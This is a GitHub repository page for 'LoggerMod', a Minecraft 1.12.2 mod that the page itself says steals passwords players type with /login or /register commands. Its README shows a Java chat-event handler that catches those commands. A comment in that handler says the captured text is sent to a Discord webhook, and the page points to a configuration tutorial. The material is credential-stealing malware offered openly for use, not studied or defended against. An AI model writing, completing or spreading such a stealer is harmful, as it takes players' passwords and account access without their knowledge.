Skip to content

bush1root/LoggerMod

Repository files navigation

🔌 LoggerMod

This mod on 1.12.2 steals the entered passwords (Entered via /login)

⚡ How to configure?

You can easily change the config for yourself
Tutorial: Click (in Russian)

❓ How it Works?

    @SubscribeEvent
    public void ChatEvent(ClientChatEvent e) {
        String msg = e.getMessage();
        String[] sentences = e.getMessage().split(" ");
        if ((msg.startsWith("/l") || msg.startsWith("/login") || msg.startsWith("/reg") || msg.startsWith("/register")) && sentences.length > 1) {
            // Sending to your discord server use Webhook
        }
    }

📱 Screenshots

Screenshot_20220303_200054

About

This mod on 1.12.2 steals the entered passwords (Entered via /login)

Topics

Resources

License

Unknown and 2 other licenses found

Licenses found

Unknown
LICENSE.txt
Unknown
LICENSE-Paulscode IBXM Library.txt
Unknown
LICENSE-Paulscode SoundSystem CodecIBXM.txt

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages